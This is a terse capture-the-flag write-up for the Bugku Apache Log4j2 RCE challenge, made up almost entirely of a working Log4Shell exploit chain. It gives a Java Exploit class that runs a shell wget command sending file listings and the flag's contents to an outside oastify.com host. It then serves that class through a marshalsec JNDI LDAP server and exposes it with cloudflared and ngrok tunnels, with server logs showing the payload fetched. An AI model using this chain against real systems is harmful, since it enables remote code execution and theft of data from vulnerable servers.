Bugku靶场Apache Log4j2 RCE

public class Exploit {
    public Exploit() {
    }

    static {
        try {
        //  String[] cmds = {"/bin/sh", "-c", "wget -qO- http://vjigzgm3930ko9hia69i0q21us0joec3.oastify.com/?result=$(ls | base64)"};
            String[] cmds = {"/bin/sh", "-c", "wget -qO- http://vjigzgm3930ko9hia69i0q21us0joec3.oastify.com/?result=$(cat flag | base64)"};
            java.lang.Runtime.getRuntime().exec(cmds).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        Exploit e = new Exploit();
    }
}

javac Exploit.java

python -m http.server 8888

cloudflared tunnel --url http://localhost:8888

+--------------------------------------------------------------------------------------------+
|  Your quick Tunnel has been created! Visit it at (it may take some time to be reachable):  |
|  https://pope-supplemental-notices-greetings.trycloudflare.com                             |
+--------------------------------------------------------------------------------------------+

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "https://pope-supplemental-notices-greetings.trycloudflare.com/#Exploit"

Listening on 0.0.0.0:1389

ngrok tcp 1389

Forwarding  tcp://0.tcp.ap.ngrok.io:10489 -> localhost:1389

$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "https://pope-supplemental-notices-greetings.trycloudflare.com/#Exploit"
Listening on 0.0.0.0:1389
Send LDAP reference result for Exploit redirecting to https://pope-supplemental-notices-greetings.trycloudflare.com/Exploit.class

$ python -m http.server 8888
Serving HTTP on :: port 8888 (http://[::]:8888/) ...
::1 - - [22/Nov/2025 22:57:23] "GET /Exploit.class HTTP/1.1" 200 -